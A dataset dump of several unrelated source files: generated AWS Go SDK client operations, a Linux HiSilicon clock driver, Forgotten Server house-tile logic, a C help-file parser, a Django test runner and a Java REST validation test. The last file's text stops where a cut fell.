text
stringlengths 608
8.17k
|
---|
// Code generated by smithy-go-codegen DO NOT EDIT.
package finspace
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Adds metadata tags to a FinSpace resource.
//
// A nil params is treated as an empty TagResourceInput, so callers may pass
// nil safely. The request is executed through the client's middleware stack
// assembled by addOperationTagResourceMiddlewares.
func (c *Client) TagResource(ctx context.Context, params *TagResourceInput, optFns ...func(*Options)) (*TagResourceOutput, error) {
	if params == nil {
		params = &TagResourceInput{}
	}

	result, metadata, err := c.invokeOperation(ctx, "TagResource", params, optFns, addOperationTagResourceMiddlewares)
	if err != nil {
		return nil, err
	}

	// The deserializer middleware produces a *TagResourceOutput here, so the
	// type assertion is expected to hold for a successful invocation.
	out := result.(*TagResourceOutput)
	out.ResultMetadata = metadata
	return out, nil
}
// TagResourceInput is the request payload for the TagResource operation.
type TagResourceInput struct {

	// The Amazon Resource Name (ARN) for the resource.
	//
	// This member is required.
	ResourceArn *string

	// One or more tags to be assigned to the resource.
	//
	// This member is required.
	Tags map[string]string
}
// TagResourceOutput is the response payload for the TagResource operation.
type TagResourceOutput struct {
	// Metadata pertaining to the operation's result.
	ResultMetadata middleware.Metadata
}
// addOperationTagResourceMiddlewares assembles the full middleware stack for
// the TagResource operation. The registration order below follows the
// generated pattern and should not be rearranged: serde first, then transport
// concerns (endpoint, signing, retry), then validation and metadata.
func addOperationTagResourceMiddlewares(stack *middleware.Stack, options Options) (err error) {
	// Wire protocol serialization/deserialization (REST-JSON).
	err = stack.Serialize.Add(&awsRestjson1_serializeOpTagResource{}, middleware.After)
	if err != nil {
		return err
	}
	err = stack.Deserialize.Add(&awsRestjson1_deserializeOpTagResource{}, middleware.After)
	if err != nil {
		return err
	}
	if err = addSetLoggerMiddleware(stack, options); err != nil {
		return err
	}
	if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
		return err
	}
	if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
		return err
	}
	// Endpoint resolution, payload hashing and SigV4 signing.
	if err = addResolveEndpointMiddleware(stack, options); err != nil {
		return err
	}
	if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
		return err
	}
	if err = addRetryMiddlewares(stack, options); err != nil {
		return err
	}
	if err = addHTTPSignerV4Middleware(stack, options); err != nil {
		return err
	}
	// Response bookkeeping: raw response capture and timing metadata.
	if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
		return err
	}
	if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
		return err
	}
	if err = addClientUserAgent(stack); err != nil {
		return err
	}
	if err = addRestJsonContentTypeCustomization(stack); err != nil {
		return err
	}
	if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
		return err
	}
	if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
		return err
	}
	// Input validation runs before the request is built.
	if err = addOpTagResourceValidationMiddleware(stack); err != nil {
		return err
	}
	if err = stack.Initialize.Add(newServiceMetadataMiddleware_opTagResource(options.Region), middleware.Before); err != nil {
		return err
	}
	if err = addRequestIDRetrieverMiddleware(stack); err != nil {
		return err
	}
	if err = addResponseErrorMiddleware(stack); err != nil {
		return err
	}
	if err = addRequestResponseLogging(stack, options); err != nil {
		return err
	}
	return nil
}
// newServiceMetadataMiddleware_opTagResource builds the initialize-step
// middleware that records service metadata (region, service ID, signing name
// and operation name) for the TagResource operation.
func newServiceMetadataMiddleware_opTagResource(region string) *awsmiddleware.RegisterServiceMetadata {
	metadata := awsmiddleware.RegisterServiceMetadata{
		Region:        region,
		ServiceID:     ServiceID,
		SigningName:   "finspace",
		OperationName: "TagResource",
	}
	return &metadata
}
|
/*
* Hisilicon clock separated gate driver
*
* Copyright (c) 2012-2013 Hisilicon Limited.
* Copyright (c) 2012-2013 Linaro Limited.
*
* Author: Haojian Zhuang <[email protected]>
* Xin Li <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
*/
#include <linux/kernel.h>
#include <linux/clk-provider.h>
#include <linux/io.h>
#include <linux/slab.h>
#include "clk.h"
/* clock separated gate register offset */
#define CLKGATE_SEPERATED_ENABLE 0x0
#define CLKGATE_SEPERATED_DISABLE 0x4
#define CLKGATE_SEPERATED_STATUS 0x8
/*
 * struct clkgate_separated - a gate controlled via separate set/clear/status
 * registers rather than a single read-modify-write register.
 * The disable and status registers live at fixed offsets from @enable.
 */
struct clkgate_separated {
	struct clk_hw	hw;
	void __iomem	*enable;	/* enable (set) register; base of the trio */
	u8		bit_idx;	/* bits in enable/disable register */
	u8		flags;		/* gate-specific flags (clk_gate_flags) */
	spinlock_t	*lock;		/* optional lock serialising register access */
};
/*
 * clkgate_separated_enable - gate on: write the gate bit to the set register.
 * Writing BIT(bit_idx) to the enable register only affects that bit, so no
 * read-modify-write is needed. The status read afterwards flushes the posted
 * write before the lock is dropped.
 */
static int clkgate_separated_enable(struct clk_hw *hw)
{
	struct clkgate_separated *sclk;
	unsigned long flags = 0;
	u32 reg;

	sclk = container_of(hw, struct clkgate_separated, hw);
	if (sclk->lock)
		spin_lock_irqsave(sclk->lock, flags);
	reg = BIT(sclk->bit_idx);
	writel_relaxed(reg, sclk->enable);
	readl_relaxed(sclk->enable + CLKGATE_SEPERATED_STATUS);
	if (sclk->lock)
		spin_unlock_irqrestore(sclk->lock, flags);
	return 0;
}
/*
 * clkgate_separated_disable - gate off: write the gate bit to the clear
 * register (enable + CLKGATE_SEPERATED_DISABLE). Mirrors the enable path,
 * including the status read-back that flushes the posted write.
 */
static void clkgate_separated_disable(struct clk_hw *hw)
{
	struct clkgate_separated *sclk;
	unsigned long flags = 0;
	u32 reg;

	sclk = container_of(hw, struct clkgate_separated, hw);
	if (sclk->lock)
		spin_lock_irqsave(sclk->lock, flags);
	reg = BIT(sclk->bit_idx);
	writel_relaxed(reg, sclk->enable + CLKGATE_SEPERATED_DISABLE);
	readl_relaxed(sclk->enable + CLKGATE_SEPERATED_STATUS);
	if (sclk->lock)
		spin_unlock_irqrestore(sclk->lock, flags);
}
/*
 * clkgate_separated_is_enabled - report the hardware gate state by testing
 * this gate's bit in the status register. Returns 1 if enabled, 0 otherwise.
 */
static int clkgate_separated_is_enabled(struct clk_hw *hw)
{
	struct clkgate_separated *sclk =
		container_of(hw, struct clkgate_separated, hw);
	u32 status;

	status = readl_relaxed(sclk->enable + CLKGATE_SEPERATED_STATUS);

	return (status & BIT(sclk->bit_idx)) ? 1 : 0;
}
static struct clk_ops clkgate_separated_ops = {
.enable = clkgate_separated_enable,
.disable = clkgate_separated_disable,
.is_enabled = clkgate_separated_is_enabled,
};
/**
 * hisi_register_clkgate_sep - register a Hisilicon separated-gate clock
 * @dev: device registering the clock (may be NULL)
 * @name: clock name
 * @parent_name: parent clock name, or NULL if the gate has no parent
 * @flags: framework-level clock flags (CLK_*)
 * @reg: base of the enable/disable/status register trio
 * @bit_idx: bit controlling this gate within the registers
 * @clk_gate_flags: gate-specific flags stored in clkgate_separated.flags
 * @lock: spinlock serialising register access, or NULL if not required
 *
 * Returns the registered struct clk on success or an ERR_PTR() on failure.
 */
struct clk *hisi_register_clkgate_sep(struct device *dev, const char *name,
				      const char *parent_name,
				      unsigned long flags,
				      void __iomem *reg, u8 bit_idx,
				      u8 clk_gate_flags, spinlock_t *lock)
{
	struct clkgate_separated *sclk;
	struct clk *clk;
	struct clk_init_data init;

	/*
	 * No pr_err() on failure: the allocator already logs allocation
	 * failures, so an extra OOM message is redundant (checkpatch warns
	 * about this pattern).
	 */
	sclk = kzalloc(sizeof(*sclk), GFP_KERNEL);
	if (!sclk)
		return ERR_PTR(-ENOMEM);

	init.name = name;
	init.ops = &clkgate_separated_ops;
	init.flags = flags | CLK_IS_BASIC;
	init.parent_names = (parent_name ? &parent_name : NULL);
	init.num_parents = (parent_name ? 1 : 0);

	sclk->enable = reg + CLKGATE_SEPERATED_ENABLE;
	sclk->bit_idx = bit_idx;
	sclk->flags = clk_gate_flags;
	sclk->hw.init = &init;	/* init is copied by clk_register(); stack storage is fine */
	sclk->lock = lock;

	clk = clk_register(dev, &sclk->hw);
	if (IS_ERR(clk))
		kfree(sclk);	/* registration failed: release the private data */
	return clk;
}
|
/**
* The Forgotten Server - a free and open-source MMORPG server emulator
* Copyright (C) 2015 Mark Samman <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include "otpch.h"
#include "housetile.h"
#include "house.h"
#include "game.h"
extern Game g_game;
// Construct a house tile at the given position, bind it to its owning house
// and mark it with the house state flag.
HouseTile::HouseTile(int32_t x, int32_t y, int32_t z, House* _house) :
	DynamicTile(x, y, z), house(_house)
{
	setFlag(TILESTATE_HOUSE);
}
// Add a thing to the tile, then let the house track it if it is an item
// that actually landed on this tile (getParent() is set by Tile::addThing
// only on success).
void HouseTile::addThing(int32_t index, Thing* thing)
{
	Tile::addThing(index, thing);

	if (thing->getParent()) {
		if (Item* item = thing->getItem()) {
			updateHouse(item);
		}
	}
}
// Internal (no-event) variant of addThing; mirrors its house bookkeeping.
void HouseTile::internalAddThing(uint32_t index, Thing* thing)
{
	Tile::internalAddThing(index, thing);

	if (thing->getParent()) {
		if (Item* item = thing->getItem()) {
			updateHouse(item);
		}
	}
}
// Register house-relevant items (doors with an id, beds) with the owning
// house. Items that are no longer parented to this tile are ignored.
void HouseTile::updateHouse(Item* item)
{
	if (item->getParent() != this) {
		return;
	}

	if (Door* door = item->getDoor()) {
		if (door->getDoorId() != 0) {
			house->addDoor(door);
		}
		return;
	}

	if (BedItem* bed = item->getBed()) {
		house->addBed(bed);
	}
}
// Access control for adding things to a house tile: only invited players may
// enter, and only invited players may throw items in. Falls through to the
// base Tile check for everything else.
ReturnValue HouseTile::queryAdd(int32_t index, const Thing& thing, uint32_t count, uint32_t flags, Creature* actor/* = nullptr*/) const
{
	if (const Creature* creature = thing.getCreature()) {
		if (const Player* player = creature->getPlayer()) {
			if (!house->isInvited(player)) {
				return RETURNVALUE_PLAYERISNOTINVITED;
			}
		} else {
			// Non-player creatures can never enter a house tile.
			return RETURNVALUE_NOTPOSSIBLE;
		}
	} else if (thing.getItem() && actor) {
		Player* actorPlayer = actor->getPlayer();
		// FIX: actor may be a non-player creature, in which case getPlayer()
		// returns nullptr; refuse instead of passing nullptr to isInvited().
		if (!actorPlayer || !house->isInvited(actorPlayer)) {
			return RETURNVALUE_CANNOTTHROW;
		}
	}
	return Tile::queryAdd(index, thing, count, flags, actor);
}
// Redirect uninvited players who would land on this tile to the house entry
// position. Fallback chain when the entry tile is missing: entry tile ->
// player's temple tile -> the shared null tile. Non-creatures and invited
// players use the normal Tile destination logic.
Tile* HouseTile::queryDestination(int32_t& index, const Thing& thing, Item** destItem, uint32_t& flags)
{
	if (const Creature* creature = thing.getCreature()) {
		if (const Player* player = creature->getPlayer()) {
			if (!house->isInvited(player)) {
				const Position& entryPos = house->getEntryPosition();
				Tile* destTile = g_game.map.getTile(entryPos);
				if (!destTile) {
					// Misconfigured house: log and fall back to the temple.
					std::cout << "Error: [HouseTile::queryDestination] House entry not correct"
							  << " - Name: " << house->getName()
							  << " - House id: " << house->getId()
							  << " - Tile not found: " << entryPos << std::endl;
					destTile = g_game.map.getTile(player->getTemplePosition());
					if (!destTile) {
						destTile = &(Tile::nullptr_tile);
					}
				}
				// index -1 / null destItem: drop onto the tile itself.
				index = -1;
				*destItem = nullptr;
				return destTile;
			}
		}
	}
	return Tile::queryDestination(index, thing, destItem, flags);
}
|
/*
Helpparse.c - help file parser.
Copyright (C) 2000 Imre Leber
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
If you have any questions, comments, suggestions, or fixes please
email me at: [email protected]
*/
#include <stdlib.h>
#include <string.h>
#include "hlpread.h"
static size_t AmofLines;
static char* EmptyString = "";
static char** HelpSysData = NULL;
/* CountLines - count the number of text lines in a raw buffer.
 *
 * A line break is a lone CR, a lone LF, or a CRLF pair (counted once).
 * The result is the number of breaks plus one, so an empty buffer still
 * counts as a single (empty) line.
 */
static size_t CountLines(char* RawData, size_t bufsize)
{
	size_t lines = 1;
	size_t pos;

	for (pos = 0; pos < bufsize; pos++)
	{
		if (RawData[pos] == '\r')
		{
			lines++;
			if ((pos + 1 < bufsize) && (RawData[pos + 1] == '\n'))
				pos++; /* swallow the LF half of a CRLF pair */
		}
		else if (RawData[pos] == '\n')
			lines++;
	}

	return lines;
}
/* GetNextLine - copy the next line from the buffer into *slot.
 *
 * On success returns a pointer just past the line terminator (past both
 * characters of a CRLF pair); returns NULL when malloc fails. Empty lines
 * share the static EmptyString instead of allocating.
 *
 * Fixes over the original:
 *  - restinbuf is tested BEFORE dereferencing *p, so the scan can no longer
 *    read past the end of the buffer;
 *  - the terminator look-ahead is bounded by restinbuf and only a '\n' that
 *    follows a '\r' is swallowed (the old code also swallowed the '\n' of a
 *    following blank line, silently dropping it).
 */
static char* GetNextLine(char* input, char** slot, int restinbuf)
{
	char* p = input;
	int len;

	while (restinbuf && (*p != '\r') && (*p != '\n'))
	{
		p++;
		restinbuf--;
	}

	len = (int)(p - input);
	if (len)
	{
		if ((*slot = (char*) malloc(len + 1)) == NULL)
			return NULL;
		memcpy(*slot, input, len);
		(*slot)[len] = '\0';
	}
	else
		*slot = EmptyString;

	if (!restinbuf)		/* ran off the end: nothing to skip */
		return p;
	if ((*p == '\r') && (restinbuf > 1) && (*(p + 1) == '\n'))
		return p + 2;	/* skip both halves of a CRLF pair */
	return p + 1;
}
int ParseHelpFile(char* RawData, size_t bufsize)
{
int i, j;
char* input = RawData;
AmofLines = CountLines(RawData, bufsize);
if ((HelpSysData = (char**) malloc(AmofLines * sizeof(char*))) == NULL)
return HELPMEMINSUFFICIENT;
for (i = 0; i < AmofLines; i++)
{
input = GetNextLine(input, &HelpSysData[i], (int)(bufsize - (input - RawData)));
if (!input)
{
for (j = 0; j < i; j++)
free(HelpSysData[j]);
free(HelpSysData);
HelpSysData=0;
return HELPMEMINSUFFICIENT;
}
}
return HELPSUCCESS;
}
/* GetHelpLineCount - number of lines produced by the last ParseHelpFile().
 * NOTE(review): the count is not cleared by FreeHelpSysData(), so it may be
 * stale after the data has been released -- confirm callers check for that. */
size_t GetHelpLineCount()
{
	return AmofLines;
}
char* GetHelpLine(int line)
{
return HelpSysData[line];
}
/* FreeHelpSysData - release all memory held by the parsed help text.
 *
 * Safe to call when nothing was parsed. Also resets AmofLines so that
 * GetHelpLineCount() does not report a stale count afterwards (the old
 * code left it untouched).
 */
void FreeHelpSysData()
{
	size_t i;	/* size_t to match AmofLines */

	if (HelpSysData)
	{
		for (i = 0; i < AmofLines; i++)
		{
			/* EmptyString is a shared static, never malloc'ed */
			if (HelpSysData[i] != EmptyString)
				free(HelpSysData[i]);
		}
		free(HelpSysData);
	}
	HelpSysData = NULL;
	AmofLines = 0;
}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Standalone Django test runner for django_splitdate.

Configures a minimal in-memory Django settings module, runs the test suite,
and (when the ``coverage`` package is installed) records and reports
coverage for the project tree.
"""
import logging

__author__ = 'Tim Schneider <[email protected]>'
__copyright__ = "Copyright 2015, Northbridge Development Konrad & Schneider GbR"
__credits__ = ["Tim Schneider", ]
__maintainer__ = "Tim Schneider"
__email__ = "[email protected]"
__status__ = "Development"

logger = logging.getLogger(__name__)

import glob
import os
import sys

BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
# FIX: print() as a function so the script also runs under Python 3
# (the bare ``print BASE_DIR`` statement was Python-2-only syntax).
print(BASE_DIR)
sys.path.insert(0, os.path.abspath(BASE_DIR))

# Coverage is optional: measure only when the package is importable.
try:
    import coverage  # Import coverage if available

    cov = coverage.coverage(
        cover_pylib=False,
        config_file=os.path.join(os.path.dirname(__file__), 'coverage.conf'),
        include='%s/*' % BASE_DIR,
    )
    cov.start()
    sys.stdout.write('Using coverage\n')
except ImportError:
    cov = None
    sys.stdout.write('Coverage not available. To evaluate the coverage, please install coverage.\n')

import django
from django.conf import settings
from django.core.management import execute_from_command_line

# Unfortunately, apps can not be installed via ``modify_settings``
# decorator, because it would miss the database setup.
INSTALLED_APPS = (
    'django_splitdate',
)

settings.configure(
    SECRET_KEY="django_tests_secret_key",
    DEBUG=False,
    TEMPLATE_DEBUG=False,
    ALLOWED_HOSTS=[],
    INSTALLED_APPS=INSTALLED_APPS,
    MIDDLEWARE_CLASSES=[],
    ROOT_URLCONF='tests.urls',
    DATABASES={
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
        }
    },
    LANGUAGE_CODE='en-us',
    TIME_ZONE='UTC',
    USE_I18N=True,
    USE_L10N=True,
    USE_TZ=True,
    STATIC_URL='/static/',
    # Use a fast hasher to speed up tests.
    PASSWORD_HASHERS=(
        'django.contrib.auth.hashers.MD5PasswordHasher',
    ),
    FIXTURE_DIRS=glob.glob(BASE_DIR + '/' + '*/fixtures/')
)

django.setup()
args = [sys.argv[0], 'test']
# Current module (``tests``) and its submodules.
test_cases = '.'

# Allow accessing test options from the command line: a first non-option
# argument selects the test label to run.
offset = 1
try:
    sys.argv[1]
except IndexError:
    pass
else:
    option = sys.argv[1].startswith('-')
    if not option:
        test_cases = sys.argv[1]
        offset = 2

args.append(test_cases)
# ``verbosity`` can be overwritten from command line.
#args.append('--verbosity=2')
args.extend(sys.argv[offset:])

execute_from_command_line(args)

if cov is not None:
    sys.stdout.write('Evaluating Coverage\n')
    cov.stop()
    cov.save()
    sys.stdout.write('Generating HTML Report\n')
    cov.html_report()
/*
* Copyright 2013, The Sporting Exchange Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Originally from UpdatedComponentTests/StandardValidation/REST/Rest_IDL_QueryParam_ENUM_blank.xls;
package com.betfair.cougar.tests.updatedcomponenttests.standardvalidation.rest;
import com.betfair.testing.utils.cougar.misc.XMLHelpers;
import com.betfair.testing.utils.cougar.assertions.AssertionUtils;
import com.betfair.testing.utils.cougar.beans.HttpCallBean;
import com.betfair.testing.utils.cougar.beans.HttpResponseBean;
import com.betfair.testing.utils.cougar.enums.CougarMessageProtocolRequestTypeEnum;
import com.betfair.testing.utils.cougar.manager.AccessLogRequirement;
import com.betfair.testing.utils.cougar.manager.CougarManager;
import org.testng.annotations.Test;
import org.w3c.dom.Document;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;
import java.sql.Timestamp;
import java.util.HashMap;
import java.util.Map;
/**
 * Ensure that Cougar returns the correct fault, when a REST request passes a blank ENUM Query parameter.
 * Expects a DSC-0044 client fault and HTTP 400 for all four protocol combinations.
 */
public class RestIDLQueryParamENUMblankTest {
    @Test
    public void doTest() throws Exception {
        // Create the HttpCallBean pointing at the baseline service
        CougarManager cougarManager1 = CougarManager.getInstance();
        HttpCallBean httpCallBeanBaseline = cougarManager1.getNewHttpCallBean();
        httpCallBeanBaseline.setServiceName("baseline", "cougarBaseline");
        httpCallBeanBaseline.setVersion("v2");
        // Set up the Http Call Bean to make the request
        // (removed a no-op self-assignment and an unused alias variable from the generated code)
        CougarManager cougarManager2 = CougarManager.getInstance();
        HttpCallBean getNewHttpCallBean2 = cougarManager2.getNewHttpCallBean("87.248.113.14");
        cougarManager2.setCougarFaultControllerJMXMBeanAttrbiute("DetailedFaults", "false");
        getNewHttpCallBean2.setOperationName("enumOperation");
        getNewHttpCallBean2.setServiceName("baseline", "cougarBaseline");
        getNewHttpCallBean2.setVersion("v2");
        // Set the parameters, setting the ENUM Query parameter as blank
        Map<String, String> map3 = new HashMap<String, String>();
        map3.put("headerParam", "FooHeader");
        getNewHttpCallBean2.setHeaderParams(map3);
        Map<String, String> map4 = new HashMap<String, String>();
        map4.put("queryParam", "");
        getNewHttpCallBean2.setQueryParams(map4);
        getNewHttpCallBean2.setRestPostQueryObjects(DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new ByteArrayInputStream("<message><bodyParameter>FooBody</bodyParameter></message>".getBytes())));
        // Get current time for getting log entries later
        Timestamp getTimeAsTimeStamp11 = new Timestamp(System.currentTimeMillis());
        // Make the 4 REST calls to the operation
        cougarManager2.makeRestCougarHTTPCalls(getNewHttpCallBean2);
        // Create the expected response as an XML document (Fault)
        XMLHelpers xMLHelpers6 = new XMLHelpers();
        Document createAsDocumentXml = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
        Document createAsDocumentJson = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
        // Convert the expected response to REST types for comparison with actual responses
        Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesXml = cougarManager2.convertResponseToRestTypes(createAsDocumentXml, getNewHttpCallBean2);
        Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesJson = cougarManager2.convertResponseToRestTypes(createAsDocumentJson, getNewHttpCallBean2);
        // Check the 4 responses are as expected (Bad Request)
        HttpResponseBean response7 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLXML);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response7.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response7.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response7.getHttpStatusText());
        HttpResponseBean response8 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONJSON);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response8.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response8.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response8.getHttpStatusText());
        HttpResponseBean response9 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLJSON);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response9.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response9.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response9.getHttpStatusText());
        HttpResponseBean response10 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONXML);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response10.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response10.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response10.getHttpStatusText());
        // generalHelpers.pauseTest(500L);
        // Check the log entries are as expected
        CougarManager cougarManager13 = CougarManager.getInstance();
        cougarManager13.verifyAccessLogEntriesAfterDate(getTimeAsTimeStamp11, new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"), new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"), new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"), new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"));
    }
}
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package managedblockchain
import (
"context"
"fmt"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/managedblockchain/types"
smithy "github.com/awslabs/smithy-go"
"github.com/awslabs/smithy-go/middleware"
smithyhttp "github.com/awslabs/smithy-go/transport/http"
)
// Creates a proposal for a change to the network that other members of the network
// can vote on, for example, a proposal to add a new member to the network. Any
// member can create a proposal.
// CreateProposal builds a per-call middleware stack for the operation and
// executes it. This is older-generation smithy codegen: the add* helpers'
// return values are intentionally not checked, matching the generated
// pattern of this SDK version.
func (c *Client) CreateProposal(ctx context.Context, params *CreateProposalInput, optFns ...func(*Options)) (*CreateProposalOutput, error) {
	// Fresh stack per call; options are copied so per-call optFns cannot
	// mutate the client's shared configuration.
	stack := middleware.NewStack("CreateProposal", smithyhttp.NewStackRequest)
	options := c.options.Copy()
	for _, fn := range optFns {
		fn(&options)
	}

	// Middleware registration follows the generated ordering: serde first,
	// then transport concerns (endpoint, signing, retry), then validation
	// and metadata.
	addawsRestjson1_serdeOpCreateProposalMiddlewares(stack)
	awsmiddleware.AddRequestInvocationIDMiddleware(stack)
	smithyhttp.AddContentLengthMiddleware(stack)
	addResolveEndpointMiddleware(stack, options)
	v4.AddComputePayloadSHA256Middleware(stack)
	addRetryMiddlewares(stack, options)
	addHTTPSignerV4Middleware(stack, options)
	awsmiddleware.AddAttemptClockSkewMiddleware(stack)
	addClientUserAgent(stack)
	smithyhttp.AddErrorCloseResponseBodyMiddleware(stack)
	smithyhttp.AddCloseResponseBodyMiddleware(stack)
	addIdempotencyToken_opCreateProposalMiddleware(stack, options)
	addOpCreateProposalValidationMiddleware(stack)
	stack.Initialize.Add(newServiceMetadataMiddleware_opCreateProposal(options.Region), middleware.Before)
	addRequestIDRetrieverMiddleware(stack)
	addResponseErrorMiddleware(stack)

	// Caller-supplied API options may mutate the stack and can fail.
	for _, fn := range options.APIOptions {
		if err := fn(stack); err != nil {
			return nil, err
		}
	}
	handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack)
	result, metadata, err := handler.Handle(ctx, params)
	if err != nil {
		// Wrap the failure with service/operation context for callers.
		return nil, &smithy.OperationError{
			ServiceID:     ServiceID,
			OperationName: "CreateProposal",
			Err:           err,
		}
	}
	out := result.(*CreateProposalOutput)
	out.ResultMetadata = metadata
	return out, nil
}
// CreateProposalInput is the request payload for the CreateProposal operation.
type CreateProposalInput struct {

	// The type of actions proposed, such as inviting a member or removing a member.
	// The types of Actions in a proposal are mutually exclusive. For example, a
	// proposal with Invitations actions cannot also contain Removals actions.
	//
	// This member is required.
	Actions *types.ProposalActions

	// A unique, case-sensitive identifier that you provide to ensure the idempotency
	// of the operation. An idempotent operation completes no more than one time. This
	// identifier is required only if you make a service request directly using an HTTP
	// client. It is generated automatically if you use an AWS SDK or the AWS CLI.
	// (Auto-filled by the idempotency-token middleware when left nil.)
	//
	// This member is required.
	ClientRequestToken *string

	// The unique identifier of the member that is creating the proposal. This
	// identifier is especially useful for identifying the member making the proposal
	// when multiple members exist in a single AWS account.
	//
	// This member is required.
	MemberId *string

	// The unique identifier of the network for which the proposal is made.
	//
	// This member is required.
	NetworkId *string

	// A description for the proposal that is visible to voting members, for example,
	// "Proposal to add Example Corp. as member."
	Description *string
}
// CreateProposalOutput is the response payload for the CreateProposal operation.
type CreateProposalOutput struct {
	// The unique identifier of the proposal.
	ProposalId *string

	// Metadata pertaining to the operation's result.
	ResultMetadata middleware.Metadata
}
// addawsRestjson1_serdeOpCreateProposalMiddlewares registers the REST-JSON
// serializer and deserializer for the CreateProposal operation on the stack.
func addawsRestjson1_serdeOpCreateProposalMiddlewares(stack *middleware.Stack) {
	stack.Serialize.Add(&awsRestjson1_serializeOpCreateProposal{}, middleware.After)
	stack.Deserialize.Add(&awsRestjson1_deserializeOpCreateProposal{}, middleware.After)
}
// idempotencyToken_initializeOpCreateProposal auto-fills ClientRequestToken
// on CreateProposalInput when the caller did not supply one.
type idempotencyToken_initializeOpCreateProposal struct {
	tokenProvider IdempotencyTokenProvider
}

// ID identifies this middleware within the initialize step.
func (*idempotencyToken_initializeOpCreateProposal) ID() string {
	return "OperationIdempotencyTokenAutoFill"
}
// HandleInitialize fills in a generated idempotency token when the input's
// ClientRequestToken is nil, then delegates to the next handler. With no
// token provider configured it is a pass-through.
